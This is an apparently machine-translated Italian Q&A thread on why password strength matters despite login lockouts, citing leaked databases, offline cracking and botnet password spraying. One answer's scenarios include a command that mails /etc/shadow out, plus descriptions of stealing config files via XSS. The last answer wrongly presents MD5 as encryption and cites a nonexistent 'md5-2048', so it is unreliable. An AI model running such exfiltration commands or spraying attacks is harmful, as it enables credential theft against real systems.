Perché la forza della password è importante?

9

Capisco dal punto di vista crittografico che si desidera che una password sia il più casuale possibile per resistere agli attacchi di forza bruta o dizionario. Va bene, ma in quali circostanze possono effettivamente essere adottati questi approcci? Quasi ogni sistema che abbia mai avuto una password per bloccarti se inserisci più di un paio di tentativi errati. Stiamo esaminando milioni di ipotesi anche per password molto deboli, il che sembra impossibile su questi tipi di sistemi.

In che modo le persone attaccano le password oltre che dal social engineering?

    
posta Paul Becotte 21.02.2014 - 23:59
fonte

4 risposte

14

Analysis of the 32 million passwords recently exposed in the breach of social media application developer RockYou last month provides further proof that consumers routinely use easy to guess login credentials. Sensitive login credentials - stored in plain text - were left exposed because of a SQL injection bug in RockYou's website.

The emails and passwords of around 1.3 million registered users – including those of Gawker Media owner Nick Denton and its employees – were accessed and subsequently published online.

The social networking website LinkedIn was hacked on 5 June 2012, and passwords for nearly 6.5 million user accounts were stolen

A hacker collective calling itself D33Ds Co. publicly posted more than 450,000 log-in credentials -- i.e., paired usernames and passwords -- obtained from Yahoo's "Contributor Network" site.

It all started when Adobe reported the breach of more than 3 million customers' information (including password-identifying information), then upped the number to 38 million. Last week it got a whole lot worse when an outside company found the data of some 152 million Adobe customers on a site frequented by cybercriminals.

Turkish hacker Maxn3y defaced avadas.de on Saturday (archive here) before dumping what the hacker claimed were customer details online. The purportedly leaked information included incomplete configuration files for the shop.avadas.de domain, what appeared to be authentic admin login details with encrypted passwords, and (most seriously), what security experts believe is the PayPal payment information for an estimated 20,000 consumers. According to Cyberwarnews.info, which analysed the data dump, the hackers also grabbed the email addresses, user names, encrypted passwords as well as certain bank and payment details of the customers.

Thousands of Tesco customers have had their emails and passwords posted online after hackers got their hands on the login details.

...

Affidarsi al limite tariffario per gli attacchi con password è tutto a posto fino a quando il database delle password non è trapelato.

Quando il database delle password è in chiaro, il gioco è finito per questa password. Non puoi mitigarlo avendo una password sicura, solo non riutilizzando la stessa password (o una password facile da modificare come swordfish!Yahoo vs swordfish!Tesco ) su siti diversi.

Quando il database delle password è sottoposto a hashing, gli autori degli attacchi impiegano un po 'di tempo per eseguire una ricerca offline e trovare le password. Più strong è la password e il migliore hash, più a lungo l'hacker avrà bisogno . Se la tua password è abbastanza strong, allora potresti avere la possibilità di cambiare la tua password prima che qualsiasi utente malintenzionato trovi la tua password. Ciò mette gli utenti in competizione: le password più deboli saranno le prime a essere sfruttate. Anche in questo caso, dovrai cambiare la password ovunque la utilizzi, il che è strongmente favorevole alle password veramente uniche del sito.

    
risposta data 22.02.2014 - 00:38
fonte
5

Supponiamo che tu abbia una botnet in grado di distribuire i tentativi di accesso su molti IP univoci del client (abbastanza che non sia facile per qualcuno semplicemente firewall) e vuoi usare la botnet per indovinare i login corretti su popularwebsite.com da brute vigore. Supponiamo inoltre che popularwebsite.com blocchi un account utente dopo 5 tentativi di accesso errati in una riga.

Nessun problema. Avvia il tuo botnet e lancia 1000 tentativi di accesso al secondo, da un set di IP sorgente molto diffuso. Ogni tentativo di accesso utilizza una delle password più comuni ( 123456 , password , ecc.) E tenta di indovinare un account utente con tale password. (Dovrebbe essere facile se hanno un database di indirizzi e-mail per ottenere idee.) popularwebsite.com smette di accettare tutti i tentativi di accesso con quella password se non indovini l'utente giusto abbastanza veloce? Ne dubito!

Quindi quali sono le nostre prospettive qui? Per prima cosa facciamo alcune ipotesi:

  • 20% dei nomi di account utente che supponiamo esistano effettivamente (i fattori che incidono su questo includono il numero lordo di account, la correlazione tra l'account utente e l'indirizzo email, la qualità del nostro database email)
  • Il 4,7% degli utenti usa password come password

Ciò significherebbe che se provassimo ogni volta password come password, la probabilità che un singolo utente indovinasse il login fosse corretta:

47 / (1000 * 5) = 0.94%

Quindi, se siamo efficaci al 20% a indovinare gli account degli utenti effettivi, otteniamo un hit ogni 106 tentativi, o circa 10 successi al secondo usando la nostra botnet immaginata. Questo è senza alcun compromesso o exploit lato server, solo indovinando gli accessi. E se la nostra botnet gira sui PC domestici degli utenti, l'unico modo in cui il target può fermare l'attacco è forzare il 4,7% dei loro utenti a cambiare la loro password, il che farebbe inseguire alcuni di loro e ricominciamo con 123456 .

Ma se le persone usano password che nessun altro usa, non è neanche lontanamente altrettanto facile far pagare questo attacco.

    
risposta data 22.02.2014 - 07:15
fonte
4

Le persone con intenzioni malevole potrebbero andare a rubare informazioni sensibili (ad esempio password) tramite i seguenti metodi.

  • Intrusione host

Esempio: l'hacker malintenzionato prende lavoro per la società attaccata come sviluppatore su un contratto di 3 mesi e riceve un account di shell su un server con privilegi limitati e chiedo all'amministratore di sistema di verificare la presenza di un problema sconosciuto che ostacola il mio lavoro. Sono riuscito a convincerlo a darmi i privilegi di root per uno script di shell scritto da me per cinque minuti, in quanto aiuta a personalizzare l'ambiente di lavoro e accelera notevolmente il mio progetto. Dato che è impegnato con altre cose e ha una riunione in dieci minuti, mi concede root privilegi per il mio script personalizzato per 10 minuti. Ho impostato una trappola, lo script dannoso viene eseguito con i privilegi di root, che inviano il file /etc/shadow all'account di posta elettronica della mia azienda. Alcune settimane dopo avrò concesso il mio accesso VPN, effettuerò il collegamento VPN dalla mia macchina domestica e riceverò una copia / incolla dall'email della mia azienda sul desktop di casa. Ho ottenuto gli hash delle password.

  • Accesso fisico non autorizzato alle workstation

Esempio: un hacker malintenzionato si impegna come addetto alle pulizie per l'impresa di pulizie che subappalta i subappalti per l'azienda. È autorizzato ad accedere ai locali del dipartimento IT, compreso l'amministratore di sistema o il capo degli sviluppatori. Cerca password o informazioni sensibili su post-it o cerca di trovare workstation sbloccate ecc. Prima o poi ne troverà una. Immagina il terminale aperto dell'amministratore di sistema che ha lasciato accidentalmente il terminale della shell aperto dopo essere uscito di casa in fretta. Ovviamente, i privilegi di sudo con root di accesso sono ancora aperti dato che si era dimenticato di chiudere la sua workstation ... mentre sta pulendo la sua scrivania, spazzolando via la polvere dalla tastiera, si guarda intorno, nessuno sta guardando , l'intero ufficio è vuoto, tutti erano andati a casa per la giornata. Digita rapidamente cat /etc/shadow | mail [email protected] e ottiene gli hash delle password.

  • attacco XSS

Esempio: contro un server Web scarsamente protetto un hacker malintenzionato riesce a eseguire uno script XSS, in cui l'iniezione di codice esegue un comando che gli invia il file chiamato /root/my.cnf che l'amministratore di sistema aveva dimenticato di rimuovere dal server web con MySQL era stato creato. Aveva pensato che la sua cartella HOME fosse comunque sicura, quindi pensava che la rimozione dei file incluse le password da HOME di root non fosse una priorità. La password MySQL sembra essere la stessa root password su quella macchina. Con la password di root, non è un'impresa da poco per ottenere altre informazioni sensibili per le password di altri server più protetti.

I metodi di cui sopra non credo siano ingegneria sociale. Spero che questo aiuti ad allargare la tua immaginazione:)

    
risposta data 22.02.2014 - 00:46
fonte
0

Mi sembra il tuo confuso vari livelli di sicurezza. la crittografia di un file è l'unico livello di sicurezza che potrebbe essere l'encriptazione md5, che sarebbe un tipo di encyption. allora hai la forza di encyrption associata al md5-2048 sarebbe di livello militare. l'altro livello di sicurezza è la tua forza della password, più è complessa e meglio è. ora se stai cercando di allegare una password, devi chiedere qual è la ragione, e la password è davvero ciò che è necessario per valutare la vulnerabilità di un sistema o puoi trovare un lavoro in giro.

  • se stai cercando di utilizzare il miglior metodo possibile, allora metti le mani su un computer quantistico.jk.

Rick

    
risposta data 25.02.2014 - 22:05
fonte

Leggi altre domande sui tag